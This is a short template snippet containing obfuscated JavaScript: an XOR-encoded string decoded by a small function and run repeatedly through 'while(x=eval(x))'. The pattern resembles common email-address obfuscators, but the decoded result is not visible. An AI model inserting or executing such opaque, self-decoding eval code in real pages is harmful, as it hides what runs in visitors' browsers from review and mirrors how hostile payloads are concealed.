:javascript
  //
  <!--
  var x="function f(x,y){var i,o=\"\",l=x.length;for(i=0;i<l;i++){if(i==111)y+" +
  "=i;y%=127;o+=String.fromCharCode(x.charCodeAt(i)^(y++));}return o;}f(\"\\t\\"+
  "005\\037\\021\\007\\035\\032\\030W\\036Q\\002R\\007\\013\\037r!k/k8$%$ff6t#" +
  "bj~vf{8y+xt\\\"msuq{7X\\017AKEWeHLLk_\\004A\\001\\036\\003\\030\\023\\016\\" +
  "000\\014\\037LLKC@D\\026\\003G{-i~(~;$)=)#d(g4-,4<&}?j4tk`5cc\\177k8\\177~}" +
  ".9|e!t84<,\\036\\024I\\013J_\\030\\024\\002\\034\\034\\030\\005L\\002@\\034" +
  "\\005\\023\\001\\007\\006]F[\\027\\025S@\\001\\033V\\\"(135)Z%bi~lc\\177$je" +
  "wN1HI=r03979,./|}\\026\\020\\024yzFq\\177\\030\\030\\034qrzagic\\000\\007\\" +
  "006kdefg`{\\017\\rp\\035\\036\\030\\010\\002\\007\\010<\\025\\026=x\\177~\\" +
  "023\\014\\034\\031\\001\\030\\005egh\\005\\006klm\\002\\003\\035,\\022\\036" +
  "W\\025\\024\\034\\034^]Z019\\r\\r\\002\\010\\023\\022\\t\\030\\001\\020\\03" +
  "1\\020K\\032\\001\\025oek\\\"Z9`4;9VW;<>SL% #HIM$+)FGYGA/\\023\\021~\\177\\" +
  "025\\026\\026{t\\030\\030\\033pq\\031\\037\\000mn\\000\\007\\005jk\\013\\t\\"+
  "ng`\\n\\016\\017\\034\\035\\003qwu\\032\\033{yz\\027\\0209\\022\\023fab\\01" +
  "7\\010beg\\004\\0054\\007\\000jno<=QST9:;JA\\014\\026W\\002N\\001\\002\\004" +
  "\\006\\026\\006\\010M^QRQ\\002T#Wi)vBaaiDzhbh\\\"u&jt~Qau}Uzwk|5{swmTr\\037" +
  "\\010K\\036\\021\\025\\031\\024\\017R\\027\\037\\023\\005I\\030\\033J\\037\\"+
  "006\\006\\006\\020\\007S\\023ZTE\\026kj+x(y/|xt#c>\\\"(t8%5=19x/e5v\\007~\\" +
  "001|b\\017M\\013C\\026\\004\\020\\034A\\020F\\023D\\013N\\001\\037\\030\\00" +
  "6\\020\\032\\000\\020UQ\",111)"                                              ;
  while(x=eval(x));
  //-->
  //